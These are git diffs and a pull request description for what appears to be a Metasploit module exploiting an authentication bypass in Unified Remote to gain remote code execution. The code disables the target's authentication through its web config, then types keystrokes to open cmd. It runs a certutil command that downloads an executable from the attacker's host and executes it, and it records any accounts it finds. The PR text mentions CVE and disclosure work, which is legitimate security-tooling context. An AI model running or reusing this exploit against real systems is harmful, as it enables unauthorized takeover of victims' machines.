+    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
+    register_file_for_cleanup("#{datastore['path']}#{filename}")
+    "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{datastore['path']}#{filename}".split('').each do |letter|
+      send_key(letter)
+    end
+    send_key(ret_key)
+    sleep(datastore['SLEEP'] * 2) # give time for it to save
+
+    print_status('Attempting to open payload')
+    "#{datastore['path']}#{filename} && exit".split('').each do |letter|
+      send_key(letter)
+    end
+    send_key(ret_key)
+
+    handler
+    disconnect
+    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert
+
+    # lastly some cleanup
+    unless reset_security_mode.nil?
+      print_status('Reverting security mode')
+      security_mode['security']['mode'] = reset_security_mode
+      set_config(security_mode)
+    end
+  end
+end

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'EDB', '49587' ],
           [ 'URL', 'https://www.unifiedremote.com/' ],
           [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
-          [ 'URL', 'https://pastebin.com/raw/VMeWckHA' ],
           [ 'CVE', '2022-3229' ]
         ],
         'Arch' => [ ARCH_X64, ARCH_X86 ],

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -21,7 +21,12 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Unified Remote Auth Bypass to RCE',
         'Description' => %q{
-          This module
+          This module utilizes the Unified Remote remote control protocol to type out and
+          deploy a payload.  The remote control protocol can be configured to have no passwords,
+          a group password, or individual user accounts.  If the web page is accessible, the
+          access control is set to no password for exploitation, then reverted.
+          If the web page is not accessible, exploitation will be tried blindly.
+          This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -254,14 +259,21 @@ class MetasploitModule < Msf::Exploit::Remote
       return nil
     end
     disconnect
-    JSON.parse(res.split("\r\n\r\n")[1]) # split between headers and body
+    body = res.split("\r\n\r\n")[1]
+    if body =~ %r{<h1>Forbidden \(403\)</h1>}
+      print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')
+      return nil
+    else
+      JSON.parse(body) # split between headers and body
+    end
   end
 
   def check
     security_mode = get_config
     if security_mode.nil?
-      CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
+      return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
     end
+
     CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")
   end
 
@@ -275,18 +287,19 @@ class MetasploitModule < Msf::Exploit::Remote
     # first grab the config from the HTTP server to determine if we need to disable auth
     security_mode = get_config
     reset_security_mode = nil
-    if security_mode['security']['mode'] == 'none'
-      print_good('No security enabled')
-    else
-      print_status("#{security_mode['security']['mode']} mode enabled, password required, bypassing")
-      reset_security_mode = security_mode['security']['mode']
-      security_mode['security']['mode'] = 'none'
-      set_config(security_mode)
-    end
-
-    # now that we have the config, check if theres any users, no passwords (theyre GUIDs) so don't bother DBing them
-    security_mode['security']['users'].each do |account|
-      print_good("Found account: #{account['username']}")
+    unless security_mode.nil?
+      if security_mode['security']['mode'] == 'none'
+        print_good('No security enabled')
+      else
+        print_status("#{security_mode['security']['mode']} mode enabled, password required, bypassing")
+        reset_security_mode = security_mode['security']['mode']
+        security_mode['security']['mode'] = 'none'
+        set_config(security_mode)
+      end
+      # now that we have the config, check if theres any users, no passwords (theyre GUIDs) so don't bother DBing them
+      security_mode['security']['users'].each do |account|
+        print_good("Found account: #{account['username']}")
+      end
     end
 
     # start actually exploiting the rdp-ish server

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def restart_server
     http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
     # http client overrides sock, so we had to pick one... long live sock
-    request =	"GET /system/restart\r\n"
+    request =	"GET /system/restart HTTP/1.1\r\n"
     request <<	"Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
     request <<	"\r\n"
 
@@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Uploading new server config')
     http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
     # http client overrides sock, so we had to pick one... long live sock
-    request =	"POST /system/config\r\n"
+    request =	"POST /system/config HTTP/1.1\r\n"
     request <<	"Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
     request <<	"Accept: application/json, text/javascript, */*; q=0.01\r\n"
     request <<	"Content-Type: application/json\r\n"
@@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Retrieving server config')
     http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
     # http client overrides sock, so we had to pick one... long live sock
-    request =	"GET /system/config\r\n"
+    request =	"GET /system/config HTTP/1.1\r\n"
     request <<	"Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
     request <<	"\r\n"
 
@@ -260,12 +260,39 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     disconnect
     body = res.split("\r\n\r\n")[1]
-    if body =~ %r{<h1>Forbidden \(403\)</h1>}
+    if body.include?('<h1>Forbidden (403)</h1>')
       print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')
       return nil
     else
       JSON.parse(body) # split between headers and body
     end
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: DateTime.now,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   def check
@@ -296,9 +323,17 @@ class MetasploitModule < Msf::Exploit::Remote
         security_mode['security']['mode'] = 'none'
         set_config(security_mode)
       end
-      # now that we have the config, check if theres any users, no passwords (theyre GUIDs) so don't bother DBing them
+      # now that we have the config, check if theres any users, no passwords (theyre GUIDs)
       security_mode['security']['users'].each do |account|
         print_good("Found account: #{account['username']}")
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'wifi mouse',
+          user: account['username'],
+          password: '',
+          proof: account
+        )
       end
     end
 

--- a/modules/exploits/windows/misc/unified_remote_rce.rb
+++ b/modules/exploits/windows/misc/unified_remote_rce.rb
@@ -85,6 +85,12 @@ class MetasploitModule < Msf::Exploit::Remote
     'SPACE' # 5350414345
   end
 
+  def path
+    return datastore['PATH'] if datastore['PATH'].end_with? '\\'
+
+    "#{datastore['PATH']}\\"
+  end
+
   def initialize_packet
     initialize_packet = "\x00\x00\x00\x85\x00\x01\x08"
     initialize_packet << "Action\x00" # 416374696f6e 00
@@ -486,7 +492,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if datastore['CLIENTNAME'].empty?
+    if datastore['CLIENTNAME'].blank?
       @client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"
       print_status("Client name set to: #{@client_name}")
     else
@@ -528,10 +534,10 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep(datastore['SLEEP'])
 
     filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
-    register_file_for_cleanup("#{datastore['path']}#{filename}")
+    register_file_for_cleanup("#{path}#{filename}")
     # this method was in the original edb exploit, this is significantly faster
     # and speed is of the essence since remote user input most likely breaks this module
-    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{datastore['path']}#{filename}"
+    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"
     start_service('Path' => '/') # start webserver
 
     if datastore['VISIBLE']
@@ -542,26 +548,26 @@ class MetasploitModule < Msf::Exploit::Remote
       sleep(datastore['SLEEP'])
 
       print_status('Opening command prompt')
-      'cmd.exe'.split('').each do |letter|
+      'cmd.exe'.each_char do |letter|
         send_key(letter)
       end
       send_key(ret_key)
       sleep(datastore['SLEEP'])
 
       print_status('Typing out payload')
-      stager.split('').each do |letter|
+      stager.each_char do |letter|
         send_key(letter)
       end
       send_key(ret_key)
       sleep(datastore['SLEEP'] * 2) # give time for it to save
 
       print_status('Attempting to open payload')
-      "#{datastore['path']}#{filename} && exit".split('').each do |letter|
+      "#{path}#{filename} && exit".each_char do |letter|
         send_key(letter)
       end
       send_key(ret_key)
     else
-      stager << " && #{datastore['path']}#{filename} && exit"
+      stager << " && #{path}#{filename} && exit"
       print_status('Loading Unified.Command')
       contents = load_unified_command
       sock.put("#{string_header_one(contents.length)}#{contents}")


### PR DESCRIPTION
A similar exploit to #16985

This PR adds a new module to exploit an auth bypass to rce in 'unified remote'.
Leaving it draft right now, talking to @todb / @todb-r7 about a possible CVE for it.  Also needs a real description and docs, but wanted to post for gathering info on the CVE stuff.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose? If so, can you post details so we can possibly get this CVEd as well?  Its still valid against the most recent version.

This is a neat exploit as you connect to the WEB server (no auth) to pull the config, then set the RDP-ish auth to be none if needed. Then connect to the service and ask it to open cmd, then type out what you want on the user's screen. its fun to watch shell code :).  Wrote in a cmdstager method, but due to the buffering and timeouts, decided to remove it as it just wasn't a good fit at all unfortunately. used @H4rk3nz0's original method which uses the host to host the payload on a web server and just download it. MUCH faster and more reliable.

## Verification

- [ ] install and start software. i tried it on the one linked in EDB and the most recent one on the website
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/unified_remote`
- [ ] Set `rhost` and `lhost` as required.
- [ ] `run`
- [ ] **Verify** it works with an auth method not none, and with none
- [ ] **Document** looks good